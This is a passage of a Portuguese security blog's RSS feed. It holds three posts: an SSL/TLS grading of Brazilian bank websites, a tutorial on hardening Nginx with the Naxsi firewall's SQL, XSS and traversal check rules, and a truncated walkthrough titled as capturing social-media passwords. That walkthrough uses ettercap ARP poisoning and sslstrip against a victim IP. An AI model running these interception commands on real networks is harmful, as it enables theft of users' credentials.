										<content:encoded><![CDATA[<p>Uma recente pesquisa realizada pelo Prof. Diego Aranha (<a href="http://g1.globo.com/tecnologia/blog/seguranca-digital/post/apps-de-bancos-brasileiros-tem-deficiencias-de-seguranca-diz-pesquisa.html" target="_blank">veja aqui</a>) mostrou que a maioria dos aplicativos bancários possuíam deficiência de segurança, que podiam ser exploradas por meio de um ataque MITM (man in the middle).  Mas e os Sites bancários?  Será a segurança em sites de Bancos melhor que nos aplicativos? Parece que não.</p>
<p>Utilizando o mesmo modelo de pesquisa, e com o auxílio da ferramenta da <a href="https://www.ssllabs.com/ssltest/" target="_blank">SSL Labs</a>, verifiquei que, com exceção do Santander, todos os sites testados possuem deficiências na criptografia da conexão ao Site. Tais deficiências podem ser exploradas para obter dados que trafegam durante a conexão (usuário, conta, senha, etc) por meio de um ataque MITM. Tal ataque poderia ser realizado enquanto o usuário utiliza o site em uma rede Wifi aberta, por exemplo.</p>
<p>Segue abaixo, ordenado por nota de classificação, o resumo dos sites testados:</p>
<h2>  <span style="text-decoration: underline;">Santander</span></h2>
<p><strong>Nota</strong>: <span style="color: #339966;"><strong>A<br />
</strong></span>URL testada: www.santander.com.br  Data do teste:  15 de Fevereiro, 08:15 hrs<br />
Observações: Além de utilizar apenas bons algorítimos, implementou mecanismos de segurança importantes, como Prevenção de ataques de downgrade e Segredo Futuro.</p>
<h2> <span style="text-decoration: underline;">Itaú</span></h2>
<p><strong>Nota: <span style="color: #808000;">B<br />
</span></strong><span style="color: #808000;"><span style="color: #000000;">URL Testada: www.itau.com.br</span></span><br />
Data do teste:15 de Fevereiro, 08:16 hrs<br />
Observações: Talvez por motivos de compatibilidade, mantém o suporte á MD5 e RC4, o que pode enfraquecer a criptografia da conexão. Possui suporte a Prevenção de ataques de downgrade e Segredo Futuro.</p>
<h2><span style="text-decoration: underline;">HSBC</span></h2>
<p><strong>Nota</strong>: <strong><span style="color: #ffcc00;">C</span><br />
</strong>URL testada: wwws3.hsbc.com.br  Data do teste:15 de Fevereiro, 08:17 hrs<br />
Observações: Mantém suporte ao SSLv3, o que o torna vulnerável ao ataque SSL Poodle. O algorítimo de assinatura do certificado (SHA1 com RSA) é considerado fraco.</p>
<h2><span style="text-decoration: underline;">Citibank</span></h2>
<p><strong>Nota</strong>: <strong><span style="color: #ffcc00;">C</span><br />
</strong>URL testada: www.citibank.com.br Data do teste:15 de Fevereiro, 08:18 hrs<br />
Observações: É o caso mais intrigante. De certa forma, não está vulnerável, mas utiliza apenas TLS1.0, que já é um tanto antigo.</p>
<h2><span style="text-decoration: underline;">Caixa<br />
</span></h2>
<p><strong>Nota</strong>: <strong><span style="color: #ffcc00;">C</span><br />
</strong>URL testada: internetbanking.caixa.gov.br Data do teste:15 de Fevereiro, 08:19 hrs<br />
Observações: Teria nota máxima se não mantivesse suporte a SSLv3, o que o torna vulnerável ao SSL Poodle.</p>
<h2><span style="text-decoration: underline;">Banco do Brasil<br />
</span></h2>
<p><strong>Nota</strong>: <strong><span style="color: #ffcc00;">C</span><br />
</strong>URL testada: www2.bancobrasil.com.br Data do teste:15 de Fevereiro, 08:2 hrs<br />
Observações: Utiliza um protocolo morto e outro quase (SSLv3 e TLS 1.0).</p>
<h2><span style="text-decoration: underline;">Bradesco<br />
</span></h2>
<p><strong>Nota</strong>: <strong><span style="color: #ff0000;">F</span><br />
</strong>URL testada: www.ib2.bradesco.com.br<br />
Data do teste:15 de Fevereiro, 08:21 hrs<br />
Observações:  De longe, a pior nota. Suporta apenas TLS 1.0 e SSLv3. Interessante é que, para o SSLv3 a vulnerabilidade Poodle foi mitigada, mas não foi tratada no TLS 1.0.  Além disso, a chave da criptografia é  fraca (RSA 1024 bits), e a chave da assinatura também é fraca (SHA1 com RSA).</p>
<p>&nbsp;</p>
<p>Segue abaixo a tabela com os resultados. Itens bons destacados em verde e ruins destacados em vermelho:</p>
<table border="2" width="597" cellspacing="0" cellpadding="4">
<colgroup>
<col width="168" />
<col width="30" />
<col width="67" />
<col width="45" />
<col width="60" />
<col width="41" />
<col width="41" />
<col width="78" /> </colgroup>
<tbody>
<tr valign="top">
<td bgcolor="#cccccc" width="168"></td>
<td bgcolor="#cccccc" width="30">
<p align="center"><span style="font-family: Ubuntu;">BB</span></p>
</td>
<td bgcolor="#cccccc" width="67">
<p align="center"><span style="font-family: Ubuntu;">Bradesco</span></p>
</td>
<td bgcolor="#cccccc" width="45">
<p align="center"><span style="font-family: Ubuntu;">Caixa</span></p>
</td>
<td bgcolor="#cccccc" width="60">
<p align="center"><span style="font-family: Ubuntu;">Citibank</span></p>
</td>
<td bgcolor="#cccccc" width="41">
<p align="center"><span style="font-family: Ubuntu;">HSBC</span></p>
</td>
<td bgcolor="#cccccc" width="41">
<p align="center"><span style="font-family: Ubuntu;">Itaú</span></p>
</td>
<td bgcolor="#cccccc" width="78">
<p align="center"><span style="font-family: Ubuntu;">Santander</span></p>
</td>
</tr>
<tr valign="top">
<td width="168">
<p align="center"><span style="color: #ff3333;"><span style="font-family: Ubuntu;">Suporta SSL 3</span></span></p>
</td>
<td bgcolor="#ff6666" width="30">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#ff6666" width="67">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#ff6666" width="45">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#66ff66" width="60">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td bgcolor="#ff6666" width="41">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#66ff66" width="41">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td bgcolor="#66ff66" width="78">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
</tr>
<tr valign="top">
<td width="168">
<p align="center"><span style="font-family: Ubuntu;">Emprega TLS 1.0</span></p>
</td>
<td width="30">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td width="67">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td width="45">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td width="60">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td width="41">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td width="41">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td width="78">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
</tr>
<tr valign="top">
<td width="168">
<p align="center"><span style="font-family: Ubuntu;">Emprega TLS 1.1</span></p>
</td>
<td width="30">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td width="67">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td width="45">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td width="60">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td width="41">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td width="41">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td width="78">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
</tr>
<tr valign="top">
<td width="168">
<p align="center"><span style="color: #009900;"><span style="font-family: Ubuntu;">Emprega TLS 1.2</span></span></p>
</td>
<td bgcolor="#66ff66" width="30">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#66ff66" width="67">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#66ff66" width="45">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#ff6666" width="60">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td bgcolor="#66ff66" width="41">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#66ff66" width="41">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#66ff66" width="78">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
</tr>
<tr valign="top">
<td width="168">
<p align="center"><span style="color: #ff0000;"><span style="font-family: Ubuntu;">Suporta RC4</span></span></p>
</td>
<td bgcolor="#ff6666" width="30">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#ff6666" width="67">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#66ff66" width="45">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td bgcolor="#ff6666" width="60">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#66ff66" width="41">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td bgcolor="#ff6666" width="41">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#66ff66" width="78">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
</tr>
<tr valign="top">
<td width="168">
<p align="center"><span style="color: #ff0000;"><span style="font-family: Ubuntu;">Suporta MD5</span></span></p>
</td>
<td bgcolor="#ff6666" width="30">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#ff6666" width="67">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#66ff66" width="45">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td bgcolor="#ff6666" width="60">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#66ff66" width="41">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td bgcolor="#ff6666" width="41">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#66ff66" width="78">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
</tr>
<tr valign="top">
<td width="168">
<p align="center"><span style="color: #009900;"><span style="font-family: Ubuntu;">Suporta SHA-1</span></span></p>
</td>
<td bgcolor="#66ff66" width="30">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#66ff66" width="67">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#66ff66" width="45">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#ff6666" width="60">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td bgcolor="#66ff66" width="41">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#66ff66" width="41">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#66ff66" width="78">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
</tr>
<tr valign="top">
<td width="168">
<p align="center"><span style="color: #ff0000;"><span style="font-family: Ubuntu;">Diffie-Hellman Inseguro</span></span></p>
</td>
<td width="30">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td width="67">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td width="45">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td width="60">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td width="41">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td width="41">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td width="78">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
</tr>
<tr valign="top">
<td width="168">
<p align="center"><span style="color: #ff0000;"><span style="font-family: Ubuntu;">Vulnerável ao POODLE</span></span></p>
</td>
<td bgcolor="#ff6666" width="30">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#ff6666" width="67">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#ff6666" width="45">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#66ff66" width="60">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td bgcolor="#ff6666" width="41">
<p align="center"><span style="font-family: Ubuntu;">Sim</span></p>
</td>
<td bgcolor="#66ff66" width="41">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
<td bgcolor="#66ff66" width="78">
<p align="center"><span style="font-family: Ubuntu;">Não</span></p>
</td>
</tr>
<tr valign="top">
<td width="168">
<p align="center"><strong><span style="font-family: Ubuntu;">Nota (A+ / F)</span></strong></p>
</td>
<td bgcolor="#ffff66" width="30">
<p align="center"><strong><span style="font-family: Ubuntu;">C</span></strong></p>
</td>
<td bgcolor="#ff6666" width="67">
<p align="center"><strong><span style="font-family: Ubuntu;">F</span></strong></p>
</td>
<td bgcolor="#ffff66" width="45">
<p align="center"><strong><span style="font-family: Ubuntu;">C</span></strong></p>
</td>
<td bgcolor="#ffff66" width="60">
<p align="center"><strong><span style="font-family: Ubuntu;">C</span></strong></p>
</td>
<td bgcolor="#ffff66" width="41">
<p align="center"><strong><span style="font-family: Ubuntu;">C</span></strong></p>
</td>
<td bgcolor="#ccff00" width="41">
<p align="center"><span style="font-family: Ubuntu;">B</span></p>
</td>
<td bgcolor="#66ff66" width="78">
<p align="center"><strong><span style="font-family: Ubuntu;">A</span></strong></p>
</td>
</tr>
</tbody>
</table>
<p>The post <a href="https://gesielbernardes.eti.br/seguranca-em-sites-de-bancos-suas-informacoes-estao-seguras.html">Segurança em Sites de Bancos: Suas informações estão seguras?</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Configurando Servidor Web Seguro com suporte a Php e Mysql utilizando Nginx + Naxsi + php-fpm</title>
		<link>https://gesielbernardes.eti.br/configurando-servidor-web-seguro.html</link>
		
		<dc:creator><![CDATA[gbernardes]]></dc:creator>
		<pubDate>Wed, 02 Apr 2014 14:51:09 +0000</pubDate>
				<category><![CDATA[Segurança da Informação]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[naxsi]]></category>
		<category><![CDATA[nginx]]></category>
		<category><![CDATA[segurança da informação]]></category>
		<category><![CDATA[servidor web]]></category>
		<guid isPermaLink="false">http://143.106.30.117/?p=56</guid>

					<description><![CDATA[<p>Manter um Servidor Web tem se tornado uma tarefa cada vez mais complexa. A medida em que tudo se converge para a &#8220;nuvem&#8221;,  surgem cada vez mais aplicativos e serviços que utilizam HTTP para enviar/receber dados. E proporcionalmente a esse crescimento, surgem os problemas de Segurança. Este artigo  mostra uma forma de configurar um Servidor… <span class="read-more"><a href="https://gesielbernardes.eti.br/configurando-servidor-web-seguro.html">Read More &#187;</a></span></p>
<p>The post <a href="https://gesielbernardes.eti.br/configurando-servidor-web-seguro.html">Configurando Servidor Web Seguro com suporte a Php e Mysql utilizando Nginx + Naxsi + php-fpm</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Manter um Servidor Web tem se tornado uma tarefa cada vez mais complexa. A medida em que tudo se converge para a &#8220;nuvem&#8221;,  surgem cada vez mais aplicativos e serviços que utilizam HTTP para enviar/receber dados. E proporcionalmente a esse crescimento, surgem os problemas de Segurança.<br />
Este artigo  mostra uma forma de configurar um Servidor Web Seguro com suporte á PHP e Mysql,  utilizando Nginx, Naxsi e php-fpm. Vamos entender qual a função de cada um:</p>
<ul>
<li>Nginx: Servidor HTTP de alta performance,  muito conhecido pela sua estabilidade  e facilidade de configuração.</li>
<li>Naxsi: Firewall de aplicação Web de alta performance e baixa manutenção, para uso com Nginx.</li>
<li>Php-fpm: (FastCGI Process Manager) é uma alternativa para a implementação PHP FastCGI com alguns recursos adicionais (principalmente) usado em sites pessados.¹</li>
</ul>
<p>Este tutorial foi feito utilizando CentOS 6.5.</p>
<h3>1 &#8211;  Suprir dependências</h3>
<p># yum install git mysql mysql-server openssl openssl-devel wget make gcc<br />
Obs: Um passo recomendado é utilizar o mysql_secure_installation:</p>
<p># service mysqld start<br />
# mysql_secure_installation</p>
<h3>2 &#8211; Instalando Nginx e Nasxi</h3>
<p>Muito embora o Nginx possa ser instalado via Yum, teremos que compilar ele manualmente. Isto porquê o nasxi deve ser compilado junto com o Nginx.<br />
Obs: Substituir o &#8220;x&#8221; pela versão (utilizar sempre a ultima stable).</p>
<p># wget http://nginx.org/download/nginx-1.x.x.tar.gz<br />
# git clone https://github.com/nbs-system/naxsi<br />
# tar zvfx nginx-1.x.x.tar.gz<br />
# cd nginx-1.x.x<br />
#./configure &#8211;conf-path=/etc/nginx/nginx.conf &#8211;add-module=../naxsi/naxsi_src/ &#8211;error-log-path=/var/log/nginx/error.log &#8211;http-client-body-temp-path=/var/lib/nginx/body &#8211;http-fastcgi-temp-path=/var/lib/nginx/fastcgi &#8211;http-log-path=/var/log/nginx/access.log &#8211;http-proxy-temp-path=/var/lib/nginx/proxy &#8211;lock-path=/var/lock/nginx.lock &#8211;pid-path=/var/run/nginx.pid &#8211;without-http_uwsgi_module &#8211;without-http_scgi_module &#8211;with-http_ssl_module  &#8211;with-ipv6 &#8211;prefix=/usr<br />
# make &amp;&amp; make install<br />
# mkdir /var/lib/nginx<br />
# useradd -s /bin/false -M -d /var/www  nginx<br />
<span style="line-height: 1.5em;">  </span></p>
<p><span style="line-height: 1.5em;">Caso esteja utilizando CentOS, utilizar o script de inicialização contido </span><a style="line-height: 1.5em;" href="http://wiki.nginx.org/RedHatNginxInitScript">aqui</a><span style="line-height: 1.5em;"> .</span></p>
<p><span style="text-decoration: underline;">Instalando php-fpm</span></p>
<p># yum install php php-devel php-common php-gd php-mysql php-fpm</p>
<h3>3 &#8211; Configurando ambiente</h3>
<p><span style="text-decoration: underline;">Configurando Nginx e Naxsi</span></p>
<p>Visando simplificar a configuração, iremos criar um nginx.conf &#8220;genérico&#8221;, e as configurações de cada site irão ficar em /etc/nginx/conf.d . As &#8220;rules&#8221; do naxsi de cada site irão ficar em /etc/nginx/rules.d/. Você pode <a href="https://gesielbernardes.eti.br/wp-content/uploads/2014/04/nginx.conf_.txt">clicar aqui </a>para baixar o nginx.conf ou executar o comando abaixo:</p>
<p># wget -O /etc/nginx/nginx.conf https://gesielbernardes.eti.br/wp-content/uploads/2014/04/nginx.conf_.txt</p>
<p>Vamos criar agora a estrutura do naxsi:</p>
<p># cd ../naxsi<br />
# cp naxsi_config/naxsi_core.rules /etc/nginx/naxsi_core.rules<br />
# cd nx_util<br />
# python setup.py build<br />
# python setup.py install<br />
# mkdir /etc/nginx/conf.d<br />
# mkdir /etc/nginx/rules.d</p>
<p><span style="color: #444444;"> </span><span style="font-weight: 600; color: #444444;">[AdSense-A]</span></p>
<h3>4 &#8211; Adicionando Sites</h3>
<p>Para cada site adicionado, o ideal é que seja criado um arquivo no nginx, um arquivo de regras do naxsi e um arquivo de configurações do php-fpm. Isso faz com que seja possível &#8220;isolar&#8221; os ambientes, fazendo com que a segurança seja um pouco mais reforçada. Para este tutorial, iremos adicionar um site chamado &#8220;meusite.com&#8221;. A página inicial consultara a data e hora no banco e exibirá juntamente com a pagina phpinfo. O código dela está abaixo:</p>
<p># cat /var/www/html/index.php<br />
<span style="color: #0000ff;">&lt;?php</span></p>
<p><span style="color: #0000ff;">$db = mysqli_connect(&#8220;localhost&#8221;,&#8221;meuuser&#8221;,&#8221;minhasenha&#8221;,&#8221;mysql&#8221;);</span><br />
<span style="color: #0000ff;"> $consulta = &#8220;SELECT NOW()&#8221;;</span><br />
<span style="color: #0000ff;"> $result = mysqli_query($db,$consulta);</span><br />
<span style="color: #0000ff;"> $data = mysqli_fetch_row($result);</span><br />
<span style="color: #0000ff;"> echo $data[0];</span><br />
<span style="color: #0000ff;"> phpinfo();</span></p>
<p><span style="color: #0000ff;">?&gt;</span></p>
<p>Agora vamos adicionar o site no Nginx:</p>
<p># vi /etc/nginx/conf.d/meusite.conf<br />
####################################<br />
<span style="color: #ff0000;">server {</span><br />
<span style="color: #ff0000;"> listen 80;</span><br />
<span style="line-height: 1.5em; color: #ff0000;">         server_name meusite.com.br;</span></p>
<p><span style="color: #ff0000;">location / {</span><br />
<span style="color: #ff0000;"> root /var/www/meusite/;</span><br />
<span style="color: #ff0000;"> index index.php index.html ;</span><br />
<span style="color: #ff0000;"> include /etc/nginx/rules.d/meusite.rules;</span></p>
<p><span style="color: #ff0000;">}</span></p>
<p><span style="color: #ff0000;">location ~ \.(php|html)$ {</span><br />
<span style="color: #ff0000;"> root /var/www/meusite ;</span><br />
<span style="color: #ff0000;"> include /etc/nginx/fastcgi_params;</span><br />
<span style="color: #ff0000;"> fastcgi_pass 127.0.0.1:9000;</span><br />
<span style="color: #ff0000;"> fastcgi_index index.html;</span><br />
<span style="color: #ff0000;"> fastcgi_param SCRIPT_FILENAME /var/www/meusite/$fastcgi_script_name;</span><br />
<span style="color: #ff0000;"> include fastcgi_params;</span><br />
<span style="color: #ff0000;"> include /etc/nginx/rules.d/meusite.rules;</span><br />
<span style="color: #ff0000;"> access_log /var/log/nginx/access_meusite.log;</span><br />
<span style="color: #ff0000;"> error_log /var/log/nginx/error_meusite.log;</span><br />
<span style="color: #ff0000;"> }</span></p>
<p><span style="color: #ff0000;">}</span><br />
#######################################</p>
<p>Nesse exemplo acima, as extensões &#8220;.html&#8221; e &#8220;.php&#8221; serão passadas ao php-fpm, enquanto o restante do conteúdo será processado pelo nginx. Agora será necessário criar o arquivo de regras do naxsi para este site. O padrão é o conteúdo abaixo:</p>
<p># vi /etc/nginx/rules.d/meusite.rules<br />
#####################<br />
<span style="color: #ff0000;">LearningMode; #Enables learning mode</span><br />
<span style="color: #ff0000;"> SecRulesEnabled;</span><br />
<span style="color: #ff0000;"> #SecRulesDisabled;</span><br />
<span style="color: #ff0000;"> DeniedUrl &#8220;/RequestDenied&#8221;;</span><br />
<span style="color: #ff0000;"> ## check rules</span><br />
<span style="color: #ff0000;"> CheckRule &#8220;$SQL &gt;= 8&#8221; BLOCK;</span><br />
<span style="color: #ff0000;"> CheckRule &#8220;$RFI &gt;= 8&#8221; BLOCK;</span><br />
<span style="color: #ff0000;"> CheckRule &#8220;$TRAVERSAL &gt;= 4&#8221; BLOCK;</span><br />
<span style="color: #ff0000;"> CheckRule &#8220;$EVADE &gt;= 4&#8221; BLOCK;</span><br />
<span style="color: #ff0000;"> CheckRule &#8220;$XSS &gt;= 8&#8221; BLOCK;</span><br />
########################</p>
<p>A opção &#8220;LearningMode&#8221; refere-se ao modo de aprendizagem. O naxsi é um WAF baseado em detecção de anomalias, portanto, para que ele possa identificar o que é &#8220;anormal&#8221;, é necessário gerar uma whitelist. Posteriormente, iremos ver como gerar essa whitelist.</p>
<p>Resta agora configurar o php-fpm. Iremos utilizar o arquivo default para esse exemplo, mas é recomendável criar um arquivo para cada site. <strong>Mantenha o conteúdo</strong> do arquivo e modifique <strong>APENAS</strong> as opções abaixo:</p>
<p># vi /etc/php-fpm.d/www.conf<br />
<span style="color: #ff0000;">user = nginx</span><br />
<span style="color: #ff0000;"> group = nginx</span><br />
<span style="color: #ff0000;"> chdir = /var/www/meusite/</span></p>
<p>Basta agora apenas iniciar os serviços:</p>
<p># service mysqld start<br />
# service php-fpm start<br />
# service nginx start</p>
<p>E pronto. O Servidor já está funcionando com suporte á PHP e Mysql</p>
<p><a href="https://gesielbernardes.eti.br/wp-content/uploads/2014/04/print.png"><img fetchpriority="high" decoding="async" class="alignnone size-medium wp-image-65" src="https://gesielbernardes.eti.br/wp-content/uploads/2014/04/print-300x192.png" alt="print" width="300" height="192" srcset="https://gesielbernardes.eti.br/wp-content/uploads/2014/04/print-300x192.png 300w, https://gesielbernardes.eti.br/wp-content/uploads/2014/04/print-660x424.png 660w, https://gesielbernardes.eti.br/wp-content/uploads/2014/04/print.png 856w" sizes="(max-width: 300px) 100vw, 300px" /></a></p>
<p>&nbsp;</p>
<p>Por fim, resta apenas gerar a whitelist do naxsi. Com os site em funcionamento, navegue por ele, simulando um acesso. Teste de diversos navegadores, se possível em sistemas operacionais diferentes. Agora vamos gerar o relatório a partir dos logs:</p>
<p># nx_util.py -l /var/log/nginx/error_meusite.log -o</p>
<p>Ele vai processar os arquivos e apresentar sugestões de regras, algo com abaixo:</p>
<p>BasicRule wl:1011 &#8220;mz:$HEADERS_VAR:cookie&#8221;;<br />
BasicRule wl:1010 &#8220;mz:$HEADERS_VAR:cookie&#8221;;</p>
<p>Essas sugestões você adiciona no seu arquivo de rules do site, neste caso em /etc/nginx/rules.d/meusite.rules. No mundo ideal, isso seria o suficiente. Todavia, a amostragem (acessos de teste) nem sempre são suficientes para gerar a whitelist. Ideal é se ele ficasse no modo de aprendizagem um determinado tempo, algo como uma semana, para que seja gerada uma whitelist ampla. Vale ressaltar que, neste caso, deve-se tomar cuidado para não incluir um ataque em uma whitelist.</p>
<p>Posteriormente, veremos  como utilizar SSL , e também outros ajustes que podem tornar o ambiente ainda mais seguro.</p>
<p>&nbsp;</p>
<h3>Referências:</h3>
<p>¹ http://www.php.net/manual/pt_BR/install.fpm.php<br />
<a href="https://github.com/nbs-system/naxsi/wiki">Naxsi Wiki</a></p>
<p>&nbsp;</p>
<p><span style="color: #444444;"> </span><span style="font-weight: 600; color: #444444;">[AdSense-A]</span></p>
<p>The post <a href="https://gesielbernardes.eti.br/configurando-servidor-web-seguro.html">Configurando Servidor Web Seguro com suporte a Php e Mysql utilizando Nginx + Naxsi + php-fpm</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Como capturar senhas do Facebook, Gmail, Twitter&#8230;</title>
		<link>https://gesielbernardes.eti.br/como-capturar-senhas-do-facebook-gmail-twitter.html</link>
		
		<dc:creator><![CDATA[gbernardes]]></dc:creator>
		<pubDate>Wed, 16 Nov 2011 13:29:27 +0000</pubDate>
				<category><![CDATA[Segurança da Informação]]></category>
		<category><![CDATA[ettercap]]></category>
		<category><![CDATA[senhas]]></category>
		<category><![CDATA[sslstrip]]></category>
		<guid isPermaLink="false">http://143.106.30.117/?p=11</guid>

					<description><![CDATA[<p>     Muitas vezes preocupamos muito com as invasões e ataques provenientes da Internet para nossa rede local. Porém as vezes o perigo pode estar mais próximo do que imaginamos. Cerca de 70% dos ataques são feitos a partir da rede interna. Por isso senhas absurdamente complexas aliada á algum outro meio de autenticação torna-se… <span class="read-more"><a href="https://gesielbernardes.eti.br/como-capturar-senhas-do-facebook-gmail-twitter.html">Read More &#187;</a></span></p>
<p>The post <a href="https://gesielbernardes.eti.br/como-capturar-senhas-do-facebook-gmail-twitter.html">Como capturar senhas do Facebook, Gmail, Twitter&#8230;</a> appeared first on <a href="https://gesielbernardes.eti.br">Blog do Gesiel Bernardes</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div>
<p>     Muitas vezes preocupamos muito com as invasões e ataques provenientes da Internet para nossa rede local. Porém as vezes o perigo pode estar mais próximo do que imaginamos. Cerca de 70% dos ataques são feitos a partir da rede interna. Por isso senhas absurdamente complexas aliada á algum outro meio de autenticação torna-se quase que obrigatório para uma rede Wireless. Neste pequeno tutorial veremos como um invasor pode capturar informações até mesmo consideradas como seguras e criptografadas.</p>
</div>
<div>
<p>     Desde já aviso: Não é simples e requer um conhecimento razoável na área, mas creio que funcione seguindo como “receita de bolo”.</p>
</div>
<div>
<p> <b style="line-height: 1.5em;">Requisitos:</b></p>
</div>
<ul>
<li>
<div>
<p>Computador com sistema operacional Linux (neste caso usarei o Fedora 15) conectado na mesma rede da vítima.</p>
</div>
</li>
<li>
<div>
<p>Conexão com a Internet;</p>
</div>
</li>
<li>
<div>
<p>Conhecimento intermediário em Redes/Linux.</p>
</div>
</li>
</ul>
<div>
<p>     O ataque é baseado no envenenamento da tabela ARP da vítima. Com isso, todo tráfego que a vítima enviará ao roteador será interceptado. Vamos usar menos teoria e mais prática:</p>
</div>
<div>
<p>&nbsp;</p>
</div>
<div>
<p><b>Cenário:</b></p>
</div>
<ul>
<li>IP da vítima: 192.168.0.67</li>
<li>IP do roteador: 192.168.0.1</li>
</ul>
<p>&nbsp;</p>
<p style="display: inline !important;"><span style="text-decoration: underline;">     <b>Passo 1 – Baixar e Instalar pacotes</b></span></p>
<div>
<p> <span style="line-height: 1.5em;">Executar (sempre como root) os comandos abaixo:</span></p>
</div>
<div>
<p> <i style="line-height: 1.5em;"># yum -y install ettercap python-twisted-web</i></p>
</div>
<div>
<p><i># wget <a href="http://www.thoughtcrime.org/sslstrip/sslstrip-0.9.tar.gz">http://www.thoughtcrime.org/sslstrip/sslstrip-0.9.tar.gz</a></i></p>
</div>
<div>
<p><i># tar xvfz sslstrip-0.9.tar.gz</i></p>
</div>
<div>
<p><i># cd sslstrip-0.9</i></p>
</div>
<div>
<p># python setup.py install &amp;&amp; ln -s /usr/local/bin/sslstrip /bin/sslstrip</p>
</div>
<div>
<p>&nbsp;</p>
</div>
<div>
<p><b><span style="text-decoration: underline;">     Passo 2 – Atacar a vítima</span></b></p>
</div>
<div>
<p> <span style="line-height: 1.5em;">     O primeiro passo é habilitar o encaminhamento de pacotes, utilizar o seguinte comando:</span></p>
</div>
<div>
<p> <i style="line-height: 1.5em;"># echo 1 &gt; /proc/sys/net/ipv4/ip_forward</i></p>
</div>
<div>
<p> <span style="line-height: 1.5em;">     Para envenenar a tabela ARP da vítima, iremos utilizar o Ettercap. Executar o seguinte comando:</span></p>
</div>
<div>
<p> <i style="line-height: 1.5em;"># ettercap -Tq -i eth0 -M arp:remote,oneway /IP-da-vitima/ /IP-do-roteador/</i></p>
</div>
<div>
